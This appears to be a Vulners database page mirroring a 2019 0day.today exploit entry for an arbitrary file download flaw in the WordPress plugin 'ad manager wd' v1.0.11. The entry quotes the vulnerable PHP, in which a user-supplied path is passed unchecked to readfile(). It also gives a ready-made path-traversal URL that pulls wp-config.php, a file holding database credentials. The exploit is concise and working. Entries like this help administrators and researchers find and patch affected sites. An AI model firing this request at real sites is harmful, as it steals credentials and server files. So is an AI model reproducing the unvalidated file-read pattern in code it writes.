Lucene search
K

WordPress ad manager wd v1.0.11 Plugin - Arbitrary File Download Vulnerability

🗓️ 25 Jan 2019 00:00:00Reported by 41!kh4224rDzType 
zdt
 zdt
🔗 0day.today👁 77 Views

WordPress ad manager wd v1.0.11 Plugin - Arbitrary File Download Vulnerability from 25.01.201

Code
# # # # # 
# Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File Download
# Google Dork: N/A
# Date: 25.01.2019
# Vendor Homepage: https://web-dorado.com/products/wordpress-ad-manager-wd.html
# Software: https://wordpress.org/plugins/ad-manager-wd/
# Version: 1.0.11
# Tested on: Win7 x64, 
# # # # # 
# Exploit Author: 41!kh4224rDz
# Author Mail : [email protected]
# # # # #
#  Vulnerability:
#  wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php
#
#    30/  if (isset($_GET['export']) && $_GET['export'] == 'export_csv')
#  
#    97/   $path = $_GET['path'];
#            header('Content-Description: File Transfer');
#            header('Content-Type: application/octet-stream');
#            header('Content-Transfer-Encoding: binary');
#            header('Expires: 0');
#            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
#            header('Pragma: public');
#
#            header('Content-Type: text/csv; charset=utf-8');
#            header('Content-Disposition: attachment; filename=' . basename($path));
#
#            readfile($path);
#			
# Arbitrary File Download/Exploit :
#
# http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php
# 
# # # # #


#  0day.today [2019-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation